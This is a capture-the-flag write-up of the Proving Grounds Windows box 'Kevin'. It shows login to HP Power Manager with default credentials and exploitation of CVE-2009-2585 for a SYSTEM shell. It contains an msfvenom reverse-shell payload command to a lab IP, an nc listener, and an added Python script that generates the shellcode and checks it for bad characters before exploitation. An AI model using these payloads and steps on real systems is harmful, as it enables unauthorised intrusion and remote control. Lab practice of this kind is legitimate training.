Kevin

Source: Proving Grounds | OS: Windows | Community Rating: Easy

Enumeration & Reconnaissance

  • Started AutoRecon and got flooded with open ports: 80, 135, 139, 445, 3389 and 49152-49159 (the Windows RPC dynamic range).

  • Naturally, I started with my favorite, HTTP (80).

Gaining Initial Access

  • I was greeted by an HP Power Manager login page.

HP Power Manager Login
  • Out of pure muscle memory, I typed admin:admin, and boom, it worked. After a quick poke around that turned up nothing, I searched for exploits against HP Power Manager and found CVE-2009-2585.

Got In

Exploitation

  • To use this CVE, I needed a payload. So, I generated one with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.240 LPORT=4444 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' -e x86/alpha_mixed --platform windows -f python
MSFVenom
  • Replaced the payload in the PoC and ran it: instant shell. And the best part? No privilege escalation needed. The exploit gave me SYSTEM straight away. Easiest win ever.
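The one thing the one-liner above does silently is rely on msfvenom honouring the bad-character list; if a single excluded byte slips into the encoded payload the overflow will truncate or mangle it and the shell simply never comes back. The script below is an added example, not part of the original writeup or the public PoC: it builds the same msfvenom command, reassembles the shellcode from msfvenom's `-f python` output, and refuses to hand it over if any bad character is present. Assumptions: msfvenom is on PATH, the LHOST/LPORT values are the ones from the writeup, and the bad-character list is the page's (whose final escape is truncated on the page and is therefore left out here; add it for your copy of the PoC). The sample msfvenom output embedded in the block is constructed for the check, not real shellcode.

```python
import ast
import shlex
import subprocess
from typing import List, Tuple

# Bad characters from the writeup's msfvenom command. The page's list ends in a
# truncated escape ("\x5"), so that final entry is omitted here on purpose;
# append it once you know it for your PoC.
BADCHARS = bytes.fromhex("001a3a263f2523200a0d2f2b0b")


def msfvenom_cmd(lhost: str, lport: int, badchars: bytes = BADCHARS) -> List[str]:
    """argv for the payload-generation step. The alpha_mixed encoder is
    selected explicitly with -e; the writeup's one-liner dropped the flag."""
    bad = "".join(f"\\x{b:02x}" for b in badchars)
    return [
        "msfvenom", "-p", "windows/shell_reverse_tcp",
        f"LHOST={lhost}", f"LPORT={lport}", "EXITFUNC=thread",
        "-b", bad, "-e", "x86/alpha_mixed",
        "--platform", "windows", "-f", "python",
    ]


def parse_python_buf(text: str) -> bytes:
    """Reassemble the shellcode from msfvenom's -f python output, which is a
    series of lines shaped like  buf += b"\\x89\\xe2..."  ."""
    out = b""
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("buf"):
            continue
        _, _, literal = line.partition("=")
        literal = literal.strip()
        if literal.startswith('b"') or literal.startswith("b'"):
            out += ast.literal_eval(literal)  # safe: only a bytes literal
    return out


def find_badchars(buf: bytes, badchars: bytes = BADCHARS) -> List[Tuple[int, int]]:
    """Return (offset, byte) for every bad character present in buf."""
    return [(i, b) for i, b in enumerate(buf) if b in badchars]


def generate_payload(lhost: str, lport: int, badchars: bytes = BADCHARS) -> bytes:
    """Run msfvenom, parse its output and verify the encoded payload (including
    the non-alphanumeric GetPC prologue alpha_mixed emits) is clean."""
    cmd = msfvenom_cmd(lhost, lport, badchars)
    text = subprocess.run(cmd, check=True, capture_output=True, text=True).stdout
    buf = parse_python_buf(text)
    hits = find_badchars(buf, badchars)
    if hits:
        raise ValueError(f"payload contains bad characters at {hits[:5]}")
    return buf


# Constructed sample in msfvenom's -f python shape (not real shellcode). The
# final byte is a deliberate bad character so the check has something to find.
SAMPLE_OUTPUT = (
    'buf =  b""\n'
    'buf += b"\\x89\\xe2\\xd9\\xcb\\xd9\\x74\\x24\\xf4"\n'
    'buf += b"\\x5a\\x4a\\x4a\\x00"\n'
)


if __name__ == "__main__":
    # Start the handler before firing the PoC:  nc -nlvp 4444
    print(shlex.join(msfvenom_cmd("192.168.45.240", 4444)))
    sample = parse_python_buf(SAMPLE_OUTPUT)
    print("sample check:", find_badchars(sample))  # the constructed 0x00 at the end
    buf = generate_payload("192.168.45.240", 4444)
    print(f"{len(buf)} bytes, no bad characters; paste msfvenom's buf block into the PoC")
```

Run it, copy the printed msfvenom command's `buf` block into the PoC in place of the original shellcode, and only then launch the exploit against the box with the listener already waiting. If `generate_payload` raises, extend the bad-character list or switch encoders rather than firing a payload that will never give you a shell.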

Access as System

Privilege Escalation

  • None required: the overflow sits in the HP Power Manager web service itself, which runs as SYSTEM on this host, so the reverse shell inherited that context on initial access.

Lessons Learned

  • Check for CVEs against the software you identify (here, HP Power Manager), and try default credentials first; on this box the two together were the whole path to SYSTEM.
